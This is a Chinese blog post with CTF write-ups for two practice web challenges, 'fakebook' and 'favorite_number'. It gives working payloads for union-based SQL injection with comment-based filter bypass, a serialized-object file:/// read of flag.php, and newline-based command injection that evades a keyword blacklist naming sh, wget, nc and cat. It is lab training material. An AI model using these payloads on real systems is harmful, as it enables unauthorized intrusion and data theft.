【攻防世界WEB】难度三星9分入门题(终):fakebook、favorite_number

最新推荐文章于 2024-06-15 22:06:16 发布
最新推荐文章于 2024-06-15 22:06:16 发布
阅读量348 收藏 2
点赞数
分类专栏: # 攻防世界WEB 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125942906
版权

目录

七、fakebook

解题方法:

过程:

八、favorite_number

解题方法:

过程:

七、fakebook

 

解题方法:

1、寻找注入点,发现反序列化函数,与序列化内容,猜测文件位置

过程:

查看robots.txt文件

发现是一个备份文件

正则匹配:在blog中要匹配到https://

现在再去注册

这个1可以点

 发现进行了传参

考虑是否有:

注入

文件包含

伪协议

…… 

 输入单引号报错 

但是无法闭合

换一种方法尝试

加上and 1=1

(回显正常)

 输入and 1=2

(报错)

 存在注入点

查字段数

order by 4

(回显正常)

 order by 5

(报错)

所以有4个字段

判断回显点

 尝试绕过

/**/union/**/ select /**/1,2,3,4

 发现2是回显点

爆数据库

/**/union/**/ select/**/ 1,database(),3,4

 数据库为fakebook

 

 爆表

-1 /**/union /**/ select/**/ 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema=database()#

获得了users表

爆字段

 -1 /**/union /**/ select/**/ 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#

爆数据

-1 /**/union /**/ select/**/ 1,group_concat(no,'~',data) ,3,4 from fakebook.users#

 没啥有用信息

突然关注到反序列化函数,与这个出现了多次的路径

 

文件路径

/var/www/html/view.php

那么flag的路径也可能是

/var/www/html/flag.php

因为存在反序列化函数,所以我们应该注入序列化语句

使用file:///协议去访问本地计算机文件

-1 /**/union /**/ select /**/1,2 ,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

 

但是没有显示出flag.php内容

很多flag都不显示,而在源码内,Ctrl+U查看源码 

发现一段base64加密字符

PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==

解密后为

flag{c1e552fdf77049fabf65168f22f7aeab}

八、favorite_number

 

解题方法:

1、源码分析,绕过过滤,flag寻找方法

过程:

进入后就是php代码

代码1:数组

使用$_POST["stuff"]接收数组

并且限制$stuff[0] != 'admin'

可以采用数组下标溢出绕过

stuff[2^32]=admin

$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') { 
    $num= $_POST["num"];

代码2:正则匹配

"/^\d+$/im":匹配一串数字,不能有其它字符

/m:多行匹配,有一行匹配成功,preg_match返回true

换行符:0x0a(ascii码),%0a(URL编码)

 if (preg_match("/^\d+$/im",$num)){

代码3:过滤关键字

 if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){

1、数组:数字下标溢出绕过

2、正则匹配:%0a多行绕过

3、关键字过滤:可以拼接其他命令&&(ascii码0x26,URL编码%26)

构造payload:

stuff[4294967296]=admin&stuff[1]=user&num=123%0als
 

使用bp抓包

 发现通过HackBar提交的内容被编码了

 

使用bp把它再改回原来的payload

然后再发送

 

开始寻找flag

先寻找flag的inode的索引点

payload:

stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /

再通过HackBar提交,再改包

 18497049 flag

读取flag

payload:

stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum 18497049`

再通过HackBar提交,再改包

 超时了

换一种方法

因为没过滤$,用变量拼接试试

payload:

stuff[4294967296]=admin&stuff[1]=user&num=1%0aa=f;b=lag;tac /$a$b;

 cyberpeace{7d870124ba11eacef73c2c409588eadf}

黑色地带(崛起)
关注
专栏目录
攻防世界--fakebook
m0_67467924的博客
05-22 591
继续注入,得到数据库中存在一个users表,表中含有no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS 字段,查看username,passwd字段内容,不对,这个内容就是我刚刚注册的,没有其他用户的,对我来说没用啊,看看data字段,返回值是序列化后的值。构造payload:2 /**/union /**/ select 1,load_file('/var/www/html/flag.php') ,3,4#
攻防世界 web高手进阶区 4fakebook、ics-04、ics-05、FlatScience)
闵行小鱼塘
07-16 605
继续ctf的旅程,攻防世界web高手进阶区的4fakebook、ics-04、ics-05、FlatScience
攻防世界——fakebook
m0_62063669的博客
06-22 1925
攻防世界——fakebook /user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://注册成功 点击username里的1url中有no=1,可以尝试一下,是否有注入(and 1=1不报错,and 1=2报错,所以存在sql注入) order by 4不报错,order by 5报错,所以有四个字段尝试查询数据库名,然后被拦截 尝试绕过,/**/可以绕过,发现2是回显点 得到当前数据库为fakebook ......
攻防世界-fakebook
wwxxss
11-15 760
如果我们确定了一个页面存在,访问后页面内容为空,有两种情况,要么页面本身就没有内容,那我们还玩个锤儿啊。base64,dGhlIHVzZXIgaXMgYWRtaW4,但是我们首先不知道如何对其添加语法,其次我们目前还不知道flag.php在那个目录下,因此我们利用sql注入看看。但是当我们使用联合查询的时候,发现其有过滤,我试了很久,最后借鉴其他的解法,发现是应该检测union select这个字符串,因此我们可以使用union++select活着union/**/select进行绕过。
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1444
第一次做,拿到目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
攻防世界web进阶区Fakebook
gongjingege的博客
08-04 460
打开链接 是一个类似博客的界面,有登录和注册,考虑sql注入,先注册吧 注册后用户名可以点击 会发现url栏/view.php?no=1,估计在这里注入,试了一下,存在注入点 order by 4回显正常,5不行,所以4列 用union select注入,但是被过滤了 百度可以用/**/注释符绕过, no=-1 union/**/select 1,2,3,4# 从unserialize()可以看出,数据保存时序列化,输出反序列化,显示在博客界面。 还有文件的绝对路径/var/www/html/ 直
攻防世界】十九 --- fakebook --- ssrf
qq_43168364的博客
12-29 574
目 — fakebook 一、writeup 使用dirsearch扫描目录 flag应该在flag.txt文件中 访问robots.txt文件,得到了一个目录 下来了一个文件,user.php.bak。该文件先丢在这里等下再审计,主页没有任何发现,前端代码中没有提示,login.php 也没有找到可以利用的点(可以尝试:sql,xss,逻辑漏洞,写入日志文件,爆破) 来到join.php页面注册了一个admin用户 从首页可以访问到admin用户的页面,发现存在一个查询字符串,其有sql注入漏洞
攻防世界-web高手进阶区
zji
04-25 6648
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界fakebook
qq_46230755的博客
01-10 256
打开后注册一个账户,进入个人主页 发现上面存在注入点,先试一下改点数字 发现存在报错 尝试输入 view.php?no=1 and 1=1# view.php?no=1 and 1=2# 第一个显示正常,第二个报错,确定存在注入 开始注入的测试,第一步查 存在的字段,利用order by联合查询,发现5不存在,所以应该为4位字段数。 view.php?no=1 order by 5# 接着利用联合查询语句想找哪个字段可以回显利用,为了不让我们构造的select语句与原来语句的结果混在一起,将原
攻防世界fakebook
舞动的獾
07-23 663
fakebook 拿到目,发现页面上有两个按钮,一个为join,另外一个为login,可能在注册登录界面存在注入漏洞,首先查看join。 先扔到sqlmap里面跑一波,但长时间没启动了,sqlmap坏了,没办法,手动注入吧。 先注册一个账号试试,用admin,看看admin是否能被注册,发现真的可以,但是似乎并没有什么卵用,不要忘了一个习惯,扫描。 结果发现了如下几个文件: flag.php flag.phps robots.txt view.php login.php join.php 访问一下注册
fakebook攻防世界) (正则+robots+sql+绕过)
一醉一休的博客
02-23 1847
一、fakebook攻防世界) 1) 2)扫描下可以找到有robots.txt 3)输入/user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://(可有可无),然后是数字和字符,加一个. 然后是2-6个字母 4)创建个用户,主要注意blog 5)注册成功返回 6)点开aaa 7)url中有no=1,尝试or'1'='1注入,存在注入后 order by 4# 8)...
攻防世界-web-fakebook
mlws1900的博客
07-10 194
打开网页,只有注册和登录选项,先看看robots.txt有什么直接下载一个user.php.bak文件,打开析 设定了姓名,年龄,博客,博客地址利用了正则表达式其实也没有https://无所谓 选择join选项 join成功 点开admin发现?no=1,进行注入点测试显示有注入点 ,用order by 测试到4为止可以访问,存在四列 查看数据库,发现union select被过滤了,/**/可以绕过waf,获取到数据库 数据库名fakebook,information_schema,mysq
攻防世界-高手进阶区之Fakebook
Sacrifice_li的博客
06-11 850
进来页面看到的是这样的东西: 然后先去随便点一下看看东西,这里有个join,想要注册一下内容,但是这个blog的格式不对的话就没办法join 这里就暂时没有什么思路了。 接下来去看看目录有哪些东西: 用kali的dirb或者nikto: 里面有一个bak文件,下载下来解压看一看: 然后大致查阅了一下内容,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://(可有可无),然后是数字和字符,加一个. 然后是2-6个字母,所以随便构造一个h.
【愚公系列】2023年05月 攻防世界-Webfakebook
时光隧道
05-27 7739
SQL注入是通过将恶意代码注入到SQL语句中,从而将攻击者想要的任意数据库操作(例如删除,修改或查看数据)注入到应用程序中的一种安全漏洞。这种攻击通常是通过在Web表单,搜索框或其他用户输入字段中添加特殊字符或代码来实现的,这些字符或代码可以使SQL语句产生意外的行为。攻击者可以利用这种漏洞访问敏感的数据库信息,包括用户凭据、私人信息和个人身份信息。为了保护应用程序不受SQL注入攻击的影响,开发人员通常应在接受用户输入时对数据进行验证和过滤,并使用参数化查询或预编译语句来防止SQL注入。
攻防世界-fakebook-(详细操作)做过程
qq_43715020的博客
06-20 5113
攻防世界-fakebook-(详细操作)做过程
攻防世界-fakebook目__详解
最新发布
chinese_cabbage0的博客
06-15 740
攻防世界目的详解,sql。ssrf。php。
攻防世界Fakebook】解方法
weixin_43923736的博客
06-22 800
攻防世界Fakebook】解方法
Java实现网络爬虫:模拟HTTP请求与响应解析
该爬虫能够在fakebook网站上爬行,寻找并返回五个秘密标志。" 知识点详细说明: 1. HTTP协议基础知识: HTTP(超文本传输协议)是互联网上应用最为广泛的一种网络协议,用于从服务器传输超文本到本地浏览器,使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值